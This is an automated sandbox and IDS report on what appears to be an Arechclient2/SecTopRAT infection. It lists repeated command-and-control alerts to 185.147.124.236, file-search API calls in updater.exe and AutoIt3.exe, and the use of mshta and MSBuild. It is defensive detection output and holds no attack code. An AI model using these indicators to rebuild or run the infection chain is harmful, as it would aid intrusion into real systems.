2024-12-17T08:37:35.006163+0100 | 2051910 | 1 | A Network Trojan was detected | 192.168.2.8 | 49893 | 185.147.124.236 | 15647 | TCP
2024-12-17T08:37:35.719705+0100 | 2051910 | 1 | A Network Trojan was detected | 192.168.2.8 | 49893 | 185.147.124.236 | 15647 | TCP
2024-12-17T08:37:44.447899+0100 | 2051910 | 1 | A Network Trojan was detected | 192.168.2.8 | 49900 | 185.147.124.236 | 15647 | TCP
2024-12-17T08:37:44.746311+0100 | 2051910 | 1 | A Network Trojan was detected | 192.168.2.8 | 49900 | 185.147.124.236 | 15647 | TCP
2024-12-17T08:37:45.695619+0100 | 2051910 | 1 | A Network Trojan was detected | 192.168.2.8 | 49900 | 185.147.124.236 | 15647 | TCP
2024-12-17T08:37:45.863270+0100 | 2051910 | 1 | A Network Trojan was detected | 192.168.2.8 | 49900 | 185.147.124.236 | 15647 | TCP
2024-12-17T08:37:46.239654+0100 | 2051910 | 1 | A Network Trojan was detected | 192.168.2.8 | 49902 | 185.147.124.236 | 15647 | TCP
2024-12-17T08:37:46.387503+0100 | 2051910 | 1 | A Network Trojan was detected | 192.168.2.8 | 49902 | 185.147.124.236 | 15647 | TCP
2024-12-17T08:37:46.599248+0100 | 2051910 | 1 | A Network Trojan was detected | 192.168.2.8 | 49902 | 185.147.124.236 | 15647 | TCP
2024-12-17T08:37:47.334286+0100 | 2051910 | 1 | A Network Trojan was detected | 192.168.2.8 | 49902 | 185.147.124.236 | 15647 | TCP
2024-12-17T08:37:47.362557+0100 | 2051910 | 1 | A Network Trojan was detected | 192.168.2.8 | 49902 | 185.147.124.236 | 15647 | TCP
2024-12-17T08:37:53.951882+0100 | 2051910 | 1 | A Network Trojan was detected | 192.168.2.8 | 49908 | 185.147.124.236 | 15647 | TCP
2024-12-17T08:37:54.122571+0100 | 2051910 | 1 | A Network Trojan was detected | 192.168.2.8 | 49908 | 185.147.124.236 | 15647 | TCP
2024-12-17T08:37:57.709658+0100 | 2051910 | 1 | A Network Trojan was detected | 192.168.2.8 | 49908 | 185.147.124.236 | 15647 | TCP
                    TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                    Timestamp | SID | Severity | Classtype | Source IP | Source Port | Destination IP | Destination Port | Protocol
                    Timestamp | SID | Severity | Classtype | Source IP | Source Port | Destination IP | Destination Port | Protocol
                    2024-12-17T08:34:17.122224+0100 | 2803274 | 2 | Potentially Bad Traffic | 192.168.2.8 | 49728 | 104.21.87.65 | 443 | TCP


                    AV Detection

                    Source: nopaste.net    Virustotal: Detection: 14%
                    Source: Submitted Sample    Integrated Neural Analysis Model: Matched 99.9% probability
                    Source: unknown    HTTPS traffic detected: 174.138.125.138:443 -> 192.168.2.8:49710 version: TLS 1.2
                    Source: unknown    HTTPS traffic detected: 104.21.87.65:443 -> 192.168.2.8:49713 version: TLS 1.2
                    Source: unknown    HTTPS traffic detected: 142.250.181.142:443 -> 192.168.2.8:49714 version: TLS 1.2
                    Source: unknown    HTTPS traffic detected: 172.217.19.228:443 -> 192.168.2.8:49717 version: TLS 1.2
                    Source: unknown    HTTPS traffic detected: 142.250.181.142:443 -> 192.168.2.8:49733 version: TLS 1.2
                    Source: unknown    HTTPS traffic detected: 172.217.19.228:443 -> 192.168.2.8:49759 version: TLS 1.2
                    Source: unknown    HTTPS traffic detected: 142.250.181.142:443 -> 192.168.2.8:49790 version: TLS 1.2
                    Source: Binary string: l\System.pdbuPH source: powershell.exe, 00000002.00000002.2558487594.00000000072C0000.00000004.00000020.00020000.00000000.sdmp
                    Source: Binary string: wntdll.pdbUGP source: updater.exe, 0000000E.00000002.1759708185.0000000005DE4000.00000004.00001000.00020000.00000000.sdmp, updater.exe, 0000000E.00000003.1753158780.0000000005D69000.00000004.00001000.00020000.00000000.sdmp, updater.exe, 0000000E.00000003.1753523111.0000000005C48000.00000004.00001000.00020000.00000000.sdmp, AutoIt3.exe, 00000010.00000003.1897124918.00000000054C8000.00000004.00001000.00020000.00000000.sdmp, AutoIt3.exe, 00000010.00000003.1896985871.00000000055E9000.00000004.00001000.00020000.00000000.sdmp, AutoIt3.exe, 00000010.00000002.1903281619.0000000005664000.00000004.00001000.00020000.00000000.sdmp, AutoIt3.exe, 00000015.00000003.1972191350.0000000005688000.00000004.00001000.00020000.00000000.sdmp, AutoIt3.exe, 00000015.00000002.1978320998.0000000005824000.00000004.00001000.00020000.00000000.sdmp, AutoIt3.exe, 00000015.00000003.1971927770.00000000057A9000.00000004.00001000.00020000.00000000.sdmp
                    Source: Binary string: wntdll.pdb source: updater.exe, 0000000E.00000002.1759708185.0000000005DE4000.00000004.00001000.00020000.00000000.sdmp, updater.exe, 0000000E.00000003.1753158780.0000000005D69000.00000004.00001000.00020000.00000000.sdmp, updater.exe, 0000000E.00000003.1753523111.0000000005C48000.00000004.00001000.00020000.00000000.sdmp, AutoIt3.exe, 00000010.00000003.1897124918.00000000054C8000.00000004.00001000.00020000.00000000.sdmp, AutoIt3.exe, 00000010.00000003.1896985871.00000000055E9000.00000004.00001000.00020000.00000000.sdmp, AutoIt3.exe, 00000010.00000002.1903281619.0000000005664000.00000004.00001000.00020000.00000000.sdmp, AutoIt3.exe, 00000015.00000003.1972191350.0000000005688000.00000004.00001000.00020000.00000000.sdmp, AutoIt3.exe, 00000015.00000002.1978320998.0000000005824000.00000004.00001000.00020000.00000000.sdmp, AutoIt3.exe, 00000015.00000003.1971927770.00000000057A9000.00000004.00001000.00020000.00000000.sdmp
                    Source: Binary string: em.pdb source: powershell.exe, 00000002.00000002.2565317637.0000000008321000.00000004.00000020.00020000.00000000.sdmp
                    Source: Binary string: em.pdbN|2h|2 Z|2_CorDllMainmscoree.dll source: powershell.exe, 00000002.00000002.2565317637.0000000008321000.00000004.00000020.00020000.00000000.sdmp
                    Source: Binary string: System.pdb source: powershell.exe, 00000002.00000002.2530957813.0000000000D78000.00000004.00000020.00020000.00000000.sdmp
                    Source: C:\Users\user\AppData\Local\Temp\33260509\updater.exe | Code function: 14_2_01024005 FindFirstFileW,DeleteFileW,FindNextFileW,FindClose,FindClose, | 14_2_01024005
                    Source: C:\Users\user\AppData\Local\Temp\33260509\updater.exe | Code function: 14_2_0102C2FF FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose, | 14_2_0102C2FF
                    Source: C:\Users\user\AppData\Local\Temp\33260509\updater.exe | Code function: 14_2_0102494A GetFileAttributesW,FindFirstFileW,FindClose, | 14_2_0102494A
                    Source: C:\Users\user\AppData\Local\Temp\33260509\updater.exe | Code function: 14_2_0102CD14 FindFirstFileW,FindClose, | 14_2_0102CD14
                    Source: C:\Users\user\AppData\Local\Temp\33260509\updater.exe | Code function: 14_2_0102CD9F FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf, | 14_2_0102CD9F
                    Source: C:\Users\user\AppData\Local\Temp\33260509\updater.exe | Code function: 14_2_0102F5D8 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose, | 14_2_0102F5D8
                    Source: C:\Users\user\AppData\Local\Temp\33260509\updater.exe | Code function: 14_2_0102F735 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose, | 14_2_0102F735
                    Source: C:\Users\user\AppData\Local\Temp\33260509\updater.exe | Code function: 14_2_0102FA36 FindFirstFileW,Sleep,_wcscmp,_wcscmp,FindNextFileW,FindClose, | 14_2_0102FA36
                    Source: C:\Users\user\AppData\Local\Temp\33260509\updater.exe | Code function: 14_2_01023CE2 FindFirstFileW,DeleteFileW,DeleteFileW,MoveFileW,DeleteFileW,FindNextFileW,FindClose,FindClose, | 14_2_01023CE2
                    Source: C:\Users\user\AppData\Local\Temp\33260509\updater.exe | Code function: 14_2_015F53CD FindFirstFileA,FindClose,FileTimeToLocalFileTime,FileTimeToDosDateTime, | 14_2_015F53CD
                    Source: C:\Users\user\AppData\Local\Temp\33260509\updater.exe | Code function: 14_2_015F54D5 FindFirstFileA,GetLastError, | 14_2_015F54D5
                    Source: C:\Users\user\AppData\Local\Temp\33260509\updater.exe | Code function: 14_2_015F2CFD GetModuleHandleA,GetProcAddress,lstrcpyn,lstrcpyn,lstrcpyn,FindFirstFileA,FindClose,lstrlen,lstrcpyn,lstrlen,lstrcpyn, | 14_2_015F2CFD
                    Source: C:\faggbgb\AutoIt3.exe | Code function: 16_2_00A04005 FindFirstFileW,DeleteFileW,FindNextFileW,FindClose,FindClose, | 16_2_00A04005
                    Source: C:\faggbgb\AutoIt3.exe | Code function: 16_2_00A0C2FF FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose, | 16_2_00A0C2FF
                    Source: C:\faggbgb\AutoIt3.exe | Code function: 16_2_00A0494A GetFileAttributesW,FindFirstFileW,FindClose, | 16_2_00A0494A
                    Source: C:\faggbgb\AutoIt3.exe | Code function: 16_2_00A0CD9F FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf, | 16_2_00A0CD9F
                    Source: C:\faggbgb\AutoIt3.exe | Code function: 16_2_00A0CD14 FindFirstFileW,FindClose, | 16_2_00A0CD14
                    Source: C:\faggbgb\AutoIt3.exe | Code function: 16_2_00A0F5D8 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose, | 16_2_00A0F5D8
                    Source: C:\faggbgb\AutoIt3.exe | Code function: 16_2_00A0F735 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose, | 16_2_00A0F735
                    Source: C:\faggbgb\AutoIt3.exe | Code function: 16_2_00A0FA36 FindFirstFileW,Sleep,_wcscmp,_wcscmp,FindNextFileW,FindClose, | 16_2_00A0FA36
                    Source: C:\faggbgb\AutoIt3.exe | Code function: 16_2_00A03CE2 FindFirstFileW,DeleteFileW,DeleteFileW,MoveFileW,DeleteFileW,FindNextFileW,FindClose,FindClose, | 16_2_00A03CE2
                    Source: C:\faggbgb\AutoIt3.exe | Code function: 16_2_01093125 FindFirstFileA,FindClose,FileTimeToLocalFileTime,FileTimeToDosDateTime, | 16_2_01093125
                    Source: C:\faggbgb\AutoIt3.exe | Code function: 16_2_0109322D FindFirstFileA,GetLastError, | 16_2_0109322D
                    Source: C:\faggbgb\AutoIt3.exe | Code function: 16_2_01090A55 GetModuleHandleA,GetProcAddress,lstrcpyn,lstrcpyn,lstrcpyn,FindFirstFileA,FindClose,lstrlen,lstrcpyn,lstrlen,lstrcpyn, | 16_2_01090A55
                    Source: C:\Windows\SysWOW64\mshta.exe | File opened: C:\Windows\WinSxS\x86_microsoft.windows.common-controls_6595b64144ccf1df_5.82.19041.1110_none_c0da534e38c01f4d
                    Source: C:\Windows\SysWOW64\mshta.exe | File opened: C:\Windows\SysWOW64\OneCoreUAPCommonProxyStub.dll
                    Source: C:\Windows\SysWOW64\mshta.exe | File opened: C:\Windows\SysWOW64\OneCoreCommonProxyStub.dll
                    Source: C:\Windows\SysWOW64\mshta.exe | File opened: C:\Windows\SysWOW64\sppc.dll
                    Source: C:\Windows\SysWOW64\mshta.exe | File opened: C:\Windows\SysWOW64\Bcp47Langs.dll
                    Source: C:\Windows\SysWOW64\mshta.exe | File opened: C:\Windows\SysWOW64\USERENV.dll
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe | Code function: 4x nop then lea esp, dword ptr [ebp-04h] | 15_2_0538D7EB
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe | Code function: 4x nop then jmp 0712DA3Dh | 15_2_0712D3CE
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe | Code function: 4x nop then jmp 0712DA3Dh | 15_2_0712DA19

                    Networking

                    Source: Network traffic | Suricata IDS: 2051910 - Severity 1 - ET MALWARE Arechclient2 Backdoor/SecTopRAT Related Activity : 192.168.2.8:49735 -> 185.147.124.236:15647
                    Source: Network traffic | Suricata IDS: 2029217 - Severity 1 - ET MALWARE Arechclient2 Backdoor/SecTopRAT CnC Init : 185.147.124.236:15647 -> 192.168.2.8:49735
                    Source: Network traffic | Suricata IDS: 2052248 - Severity 1 - ET MALWARE Arechclient2 Backdoor/SecTopRAT Related Activity M2 (GET) : 192.168.2.8:49749 -> 185.147.124.236:9000
                    Source: Network traffic | Suricata IDS: 2052248 - Severity 1 - ET MALWARE Arechclient2 Backdoor/SecTopRAT Related Activity M2 (GET) : 192.168.2.8:49737 -> 185.147.124.236:9000
                    Source: Network traffic | Suricata IDS: 2052248 - Severity 1 - ET MALWARE Arechclient2 Backdoor/SecTopRAT Related Activity M2 (GET) : 192.168.2.8:49751 -> 185.147.124.236:9000
                    Source: Network traffic | Suricata IDS: 2052248 - Severity 1 - ET MALWARE Arechclient2 Backdoor/SecTopRAT Related Activity M2 (GET) : 192.168.2.8:49739 -> 185.147.124.236:9000
                    Source: Network traffic | Suricata IDS: 2052248 - Severity 1 - ET MALWARE Arechclient2 Backdoor/SecTopRAT Related Activity M2 (GET) : 192.168.2.8:49753 -> 185.147.124.236:9000
                    Source: Network traffic | Suricata IDS: 2052248 - Severity 1 - ET MALWARE Arechclient2 Backdoor/SecTopRAT Related Activity M2 (GET) : 192.168.2.8:49745 -> 185.147.124.236:9000
                    Source: Network traffic | Suricata IDS: 2052248 - Severity 1 - ET MALWARE Arechclient2 Backdoor/SecTopRAT Related Activity M2 (GET) : 192.168.2.8:49742 -> 185.147.124.236:9000
                    Source: Network traffic | Suricata IDS: 2052248 - Severity 1 - ET MALWARE Arechclient2 Backdoor/SecTopRAT Related Activity M2 (GET) : 192.168.2.8:49740 -> 185.147.124.236:9000
                    Source: Network traffic | Suricata IDS: 2052248 - Severity 1 - ET MALWARE Arechclient2 Backdoor/SecTopRAT Related Activity M2 (GET) : 192.168.2.8:49746 -> 185.147.124.236:9000
                    Source: Network traffic | Suricata IDS: 2052248 - Severity 1 - ET MALWARE Arechclient2 Backdoor/SecTopRAT Related Activity M2 (GET) : 192.168.2.8:49754 -> 185.147.124.236:9000
                    Source: Network traffic | Suricata IDS: 2052248 - Severity 1 - ET MALWARE Arechclient2 Backdoor/SecTopRAT Related Activity M2 (GET) : 192.168.2.8:49763 -> 185.147.124.236:9000
                    Source: Network traffic | Suricata IDS: 2052248 - Severity 1 - ET MALWARE Arechclient2 Backdoor/SecTopRAT Related Activity M2 (GET) : 192.168.2.8:49761 -> 185.147.124.236:9000
                    Source: Network traffic | Suricata IDS: 2052248 - Severity 1 - ET MALWARE Arechclient2 Backdoor/SecTopRAT Related Activity M2 (GET) : 192.168.2.8:49760 -> 185.147.124.236:9000
                    Source: Network traffic | Suricata IDS: 2052248 - Severity 1 - ET MALWARE Arechclient2 Backdoor/SecTopRAT Related Activity M2 (GET) : 192.168.2.8:49757 -> 185.147.124.236:9000
                    Source: Network traffic | Suricata IDS: 2052248 - Severity 1 - ET MALWARE Arechclient2 Backdoor/SecTopRAT Related Activity M2 (GET) : 192.168.2.8:49743 -> 185.147.124.236:9000
                    Source: Network traffic | Suricata IDS: 2052248 - Severity 1 - ET MALWARE Arechclient2 Backdoor/SecTopRAT Related Activity M2 (GET) : 192.168.2.8:49756 -> 185.147.124.236:9000
                    Source: Network traffic | Suricata IDS: 2052248 - Severity 1 - ET MALWARE Arechclient2 Backdoor/SecTopRAT Related Activity M2 (GET) : 192.168.2.8:49765 -> 185.147.124.236:9000
                    Source: Network traffic | Suricata IDS: 2052248 - Severity 1 - ET MALWARE Arechclient2 Backdoor/SecTopRAT Related Activity M2 (GET) : 192.168.2.8:49772 -> 185.147.124.236:9000
                    Source: Network traffic | Suricata IDS: 2052248 - Severity 1 - ET MALWARE Arechclient2 Backdoor/SecTopRAT Related Activity M2 (GET) : 192.168.2.8:49766 -> 185.147.124.236:9000
                    Source: Network traffic | Suricata IDS: 2052248 - Severity 1 - ET MALWARE Arechclient2 Backdoor/SecTopRAT Related Activity M2 (GET) : 192.168.2.8:49748 -> 185.147.124.236:9000
                    Source: Network traffic | Suricata IDS: 2052248 - Severity 1 - ET MALWARE Arechclient2 Backdoor/SecTopRAT Related Activity M2 (GET) : 192.168.2.8:49771 -> 185.147.124.236:9000
                    Source: Network traffic | Suricata IDS: 2052248 - Severity 1 - ET MALWARE Arechclient2 Backdoor/SecTopRAT Related Activity M2 (GET) : 192.168.2.8:49769 -> 185.147.124.236:9000
                    Source: Network traffic | Suricata IDS: 2052248 - Severity 1 - ET MALWARE Arechclient2 Backdoor/SecTopRAT Related Activity M2 (GET) : 192.168.2.8:49768 -> 185.147.124.236:9000
                    Source: Network traffic | Suricata IDS: 2052248 - Severity 1 - ET MALWARE Arechclient2 Backdoor/SecTopRAT Related Activity M2 (GET) : 192.168.2.8:49774 -> 185.147.124.236:9000
                    Source: Network traffic | Suricata IDS: 2052248 - Severity 1 - ET MALWARE Arechclient2 Backdoor/SecTopRAT Related Activity M2 (GET) : 192.168.2.8:49775 -> 185.147.124.236:9000
                    Source: Network traffic | Suricata IDS: 2052248 - Severity 1 - ET MALWARE Arechclient2 Backdoor/SecTopRAT Related Activity M2 (GET) : 192.168.2.8:49783 -> 185.147.124.236:9000
                    Source: Network traffic | Suricata IDS: 2052248 - Severity 1 - ET MALWARE Arechclient2 Backdoor/SecTopRAT Related Activity M2 (GET) : 192.168.2.8:49788 -> 185.147.124.236:9000
                    Source: Network traffic | Suricata IDS: 2052248 - Severity 1 - ET MALWARE Arechclient2 Backdoor/SecTopRAT Related Activity M2 (GET) : 192.168.2.8:49789 -> 185.147.124.236:9000
                    Source: Network traffic | Suricata IDS: 2052248 - Severity 1 - ET MALWARE Arechclient2 Backdoor/SecTopRAT Related Activity M2 (GET) : 192.168.2.8:49777 -> 185.147.124.236:9000
                    Source: Network traffic | Suricata IDS: 2052248 - Severity 1 - ET MALWARE Arechclient2 Backdoor/SecTopRAT Related Activity M2 (GET) : 192.168.2.8:49785 -> 185.147.124.236:9000
                    Source: Network traffic | Suricata IDS: 2052248 - Severity 1 - ET MALWARE Arechclient2 Backdoor/SecTopRAT Related Activity M2 (GET) : 192.168.2.8:49780 -> 185.147.124.236:9000
                    Source: Network traffic | Suricata IDS: 2052248 - Severity 1 - ET MALWARE Arechclient2 Backdoor/SecTopRAT Related Activity M2 (GET) : 192.168.2.8:49779 -> 185.147.124.236:9000
                    Source: Network traffic | Suricata IDS: 2052248 - Severity 1 - ET MALWARE Arechclient2 Backdoor/SecTopRAT Related Activity M2 (GET) : 192.168.2.8:49782 -> 185.147.124.236:9000
                    Source: Network traffic | Suricata IDS: 2052248 - Severity 1 - ET MALWARE Arechclient2 Backdoor/SecTopRAT Related Activity M2 (GET) : 192.168.2.8:49797 -> 185.147.124.236:9000
                    Source: Network traffic | Suricata IDS: 2052248 - Severity 1 - ET MALWARE Arechclient2 Backdoor/SecTopRAT Related Activity M2 (GET) : 192.168.2.8:49794 -> 185.147.124.236:9000
                    Source: Network traffic | Suricata IDS: 2052248 - Severity 1 - ET MALWARE Arechclient2 Backdoor/SecTopRAT Related Activity M2 (GET) : 192.168.2.8:49786 -> 185.147.124.236:9000
                    Source: Network traffic | Suricata IDS: 2052248 - Severity 1 - ET MALWARE Arechclient2 Backdoor/SecTopRAT Related Activity M2 (GET) : 192.168.2.8:49791 -> 185.147.124.236:9000
                    Source: Network traffic | Suricata IDS: 2052248 - Severity 1 - ET MALWARE Arechclient2 Backdoor/SecTopRAT Related Activity M2 (GET) : 192.168.2.8:49800 -> 185.147.124.236:9000
                    Source: Network traffic | Suricata IDS: 2052248 - Severity 1 - ET MALWARE Arechclient2 Backdoor/SecTopRAT Related Activity M2 (GET) : 192.168.2.8:49799 -> 185.147.124.236:9000
                    Source: Network traffic | Suricata IDS: 2052248 - Severity 1 - ET MALWARE Arechclient2 Backdoor/SecTopRAT Related Activity M2 (GET) : 192.168.2.8:49805 -> 185.147.124.236:9000
                    Source: Network traffic | Suricata IDS: 2052248 - Severity 1 - ET MALWARE Arechclient2 Backdoor/SecTopRAT Related Activity M2 (GET) : 192.168.2.8:49802 -> 185.147.124.236:9000
                    Source: Network traffic | Suricata IDS: 2052248 - Severity 1 - ET MALWARE Arechclient2 Backdoor/SecTopRAT Related Activity M2 (GET) : 192.168.2.8:49803 -> 185.147.124.236:9000
                    Source: Network traffic | Suricata IDS: 2051910 - Severity 1 - ET MALWARE Arechclient2 Backdoor/SecTopRAT Related Activity : 192.168.2.8:49809 -> 185.147.124.236:15647
                    Source: Network traffic | Suricata IDS: 2052248 - Severity 1 - ET MALWARE Arechclient2 Backdoor/SecTopRAT Related Activity M2 (GET) : 192.168.2.8:49796 -> 185.147.124.236:9000
                    Source: Network traffic | Suricata IDS: 2051910 - Severity 1 - ET MALWARE Arechclient2 Backdoor/SecTopRAT Related Activity : 192.168.2.8:49817 -> 185.147.124.236:15647
                    Source: Network traffic | Suricata IDS: 2051910 - Severity 1 - ET MALWARE Arechclient2 Backdoor/SecTopRAT Related Activity : 192.168.2.8:49818 -> 185.147.124.236:15647
                    Source: Network traffic | Suricata IDS: 2052248 - Severity 1 - ET MALWARE Arechclient2 Backdoor/SecTopRAT Related Activity M2 (GET) : 192.168.2.8:49812 -> 185.147.124.236:9000
                    Source: Network traffic | Suricata IDS: 2052248 - Severity 1 - ET MALWARE Arechclient2 Backdoor/SecTopRAT Related Activity M2 (GET) : 192.168.2.8:49808 -> 185.147.124.236:9000
                    Source: Network traffic | Suricata IDS: 2052248 - Severity 1 - ET MALWARE Arechclient2 Backdoor/SecTopRAT Related Activity M2 (GET) : 192.168.2.8:49816 -> 185.147.124.236:9000
                    Source: Network traffic | Suricata IDS: 2052248 - Severity 1 - ET MALWARE Arechclient2 Backdoor/SecTopRAT Related Activity M2 (GET) : 192.168.2.8:49819 -> 185.147.124.236:9000
                    Source: Network traffic | Suricata IDS: 2052248 - Severity 1 - ET MALWARE Arechclient2 Backdoor/SecTopRAT Related Activity M2 (GET) : 192.168.2.8:49814 -> 185.147.124.236:9000
                    Source: Network traffic | Suricata IDS: 2051910 - Severity 1 - ET MALWARE Arechclient2 Backdoor/SecTopRAT Related Activity : 192.168.2.8:49822 -> 185.147.124.236:15647
                    Source: Network traffic | Suricata IDS: 2029217 - Severity 1 - ET MALWARE Arechclient2 Backdoor/SecTopRAT CnC Init : 185.147.124.236:15647 -> 192.168.2.8:49817
                    Source: Network traffic | Suricata IDS: 2029217 - Severity 1 - ET MALWARE Arechclient2 Backdoor/SecTopRAT CnC Init : 185.147.124.236:15647 -> 192.168.2.8:49818
                    Source: Network traffic | Suricata IDS: 2052248 - Severity 1 - ET MALWARE Arechclient2 Backdoor/SecTopRAT Related Activity M2 (GET) : 192.168.2.8:49821 -> 185.147.124.236:9000
                    Source: Network traffic | Suricata IDS: 2029217 - Severity 1 - ET MALWARE Arechclient2 Backdoor/SecTopRAT CnC Init : 185.147.124.236:15647 -> 192.168.2.8:49809
                    Source: Network traffic | Suricata IDS: 2029217 - Severity 1 - ET MALWARE Arechclient2 Backdoor/SecTopRAT CnC Init : 185.147.124.236:15647 -> 192.168.2.8:49822
                    Source: Network traffic | Suricata IDS: 2052248 - Severity 1 - ET MALWARE Arechclient2 Backdoor/SecTopRAT Related Activity M2 (GET) : 192.168.2.8:49820 -> 185.147.124.236:9000
                    Source: Network traffic | Suricata IDS: 2052248 - Severity 1 - ET MALWARE Arechclient2 Backdoor/SecTopRAT Related Activity M2 (GET) : 192.168.2.8:49823 -> 185.147.124.236:9000
                    Source: Network traffic | Suricata IDS: 2052248 - Severity 1 - ET MALWARE Arechclient2 Backdoor/SecTopRAT Related Activity M2 (GET) : 192.168.2.8:49813 -> 185.147.124.236:9000
                    Source: Network traffic | Suricata IDS: 2051910 - Severity 1 - ET MALWARE Arechclient2 Backdoor/SecTopRAT Related Activity : 192.168.2.8:49815 -> 185.147.124.236:15647
                    Source: Network traffic | Suricata IDS: 2052248 - Severity 1 - ET MALWARE Arechclient2 Backdoor/SecTopRAT Related Activity M2 (GET) : 192.168.2.8:49824 -> 185.147.124.236:9000
                    Source: Network traffic | Suricata IDS: 2052248 - Severity 1 - ET MALWARE Arechclient2 Backdoor/SecTopRAT Related Activity M2 (GET) : 192.168.2.8:49811 -> 185.147.124.236:9000
                    Source: Network traffic | Suricata IDS: 2052248 - Severity 1 - ET MALWARE Arechclient2 Backdoor/SecTopRAT Related Activity M2 (GET) : 192.168.2.8:49825 -> 185.147.124.236:9000
                    Source: Network traffic | Suricata IDS: 2051910 - Severity 1 - ET MALWARE Arechclient2 Backdoor/SecTopRAT Related Activity : 192.168.2.8:49827 -> 185.147.124.236:15647
                    Source: Network traffic | Suricata IDS: 2052248 - Severity 1 - ET MALWARE Arechclient2 Backdoor/SecTopRAT Related Activity M2 (GET) : 192.168.2.8:49793 -> 185.147.124.236:9000
                    Source: Network traffic | Suricata IDS: 2052248 - Severity 1 - ET MALWARE Arechclient2 Backdoor/SecTopRAT Related Activity M2 (GET) : 192.168.2.8:49826 -> 185.147.124.236:9000
                    Source: Network traffic | Suricata IDS: 2052248 - Severity 1 - ET MALWARE Arechclient2 Backdoor/SecTopRAT Related Activity M2 (GET) : 192.168.2.8:49828 -> 185.147.124.236:9000
                    Source: Network traffic | Suricata IDS: 2052248 - Severity 1 - ET MALWARE Arechclient2 Backdoor/SecTopRAT Related Activity M2 (GET) : 192.168.2.8:49829 -> 185.147.124.236:9000
                    Source: Network traffic | Suricata IDS: 2052248 - Severity 1 - ET MALWARE Arechclient2 Backdoor/SecTopRAT Related Activity M2 (GET) : 192.168.2.8:49830 -> 185.147.124.236:9000
                    Source: Network traffic | Suricata IDS: 2052248 - Severity 1 - ET MALWARE Arechclient2 Backdoor/SecTopRAT Related Activity M2 (GET) : 192.168.2.8:49831 -> 185.147.124.236:9000
                    Source: Network traffic | Suricata IDS: 2052248 - Severity 1 - ET MALWARE Arechclient2 Backdoor/SecTopRAT Related Activity M2 (GET) : 192.168.2.8:49832 -> 185.147.124.236:9000
                    Source: Network traffic | Suricata IDS: 2052248 - Severity 1 - ET MALWARE Arechclient2 Backdoor/SecTopRAT Related Activity M2 (GET) : 192.168.2.8:49833 -> 185.147.124.236:9000
                    Source: Network traffic | Suricata IDS: 2052248 - Severity 1 - ET MALWARE Arechclient2 Backdoor/SecTopRAT Related Activity M2 (GET) : 192.168.2.8:49807 -> 185.147.124.236:9000
                    Source: Network traffic | Suricata IDS: 2052248 - Severity 1 - ET MALWARE Arechclient2 Backdoor/SecTopRAT Related Activity M2 (GET) : 192.168.2.8:49835 -> 185.147.124.236:9000
                    Source: Network traffic | Suricata IDS: 2052248 - Severity 1 - ET MALWARE Arechclient2 Backdoor/SecTopRAT Related Activity M2 (GET) : 192.168.2.8:49836 -> 185.147.124.236:9000
                    Source: Network traffic | Suricata IDS: 2029217 - Severity 1 - ET MALWARE Arechclient2 Backdoor/SecTopRAT CnC Init : 185.147.124.236:15647 -> 192.168.2.8:49827
                    Source: Network traffic | Suricata IDS: 2052248 - Severity 1 - ET MALWARE Arechclient2 Backdoor/SecTopRAT Related Activity M2 (GET) : 192.168.2.8:49837 -> 185.147.124.236:9000
                    Source: Network traffic | Suricata IDS: 2052248 - Severity 1 - ET MALWARE Arechclient2 Backdoor/SecTopRAT Related Activity M2 (GET) : 192.168.2.8:49838 -> 185.147.124.236:9000
                    Source: Network traffic | Suricata IDS: 2052248 - Severity 1 - ET MALWARE Arechclient2 Backdoor/SecTopRAT Related Activity M2 (GET) : 192.168.2.8:49839 -> 185.147.124.236:9000
                    Source: Network traffic | Suricata IDS: 2052248 - Severity 1 - ET MALWARE Arechclient2 Backdoor/SecTopRAT Related Activity M2 (GET) : 192.168.2.8:49840 -> 185.147.124.236:9000
                    Source: Network traffic | Suricata IDS: 2052248 - Severity 1 - ET MALWARE Arechclient2 Backdoor/SecTopRAT Related Activity M2 (GET) : 192.168.2.8:49841 -> 185.147.124.236:9000
                    Source: Network traffic | Suricata IDS: 2052248 - Severity 1 - ET MALWARE Arechclient2 Backdoor/SecTopRAT Related Activity M2 (GET) : 192.168.2.8:49843 -> 185.147.124.236:9000
                    Source: Network traffic | Suricata IDS: 2052248 - Severity 1 - ET MALWARE Arechclient2 Backdoor/SecTopRAT Related Activity M2 (GET) : 192.168.2.8:49844 -> 185.147.124.236:9000
                    Source: Network traffic | Suricata IDS: 2052248 - Severity 1 - ET MALWARE Arechclient2 Backdoor/SecTopRAT Related Activity M2 (GET) : 192.168.2.8:49842 -> 185.147.124.236:9000
                    Source: Network traffic | Suricata IDS: 2052248 - Severity 1 - ET MALWARE Arechclient2 Backdoor/SecTopRAT Related Activity M2 (GET) : 192.168.2.8:49845 -> 185.147.124.236:9000
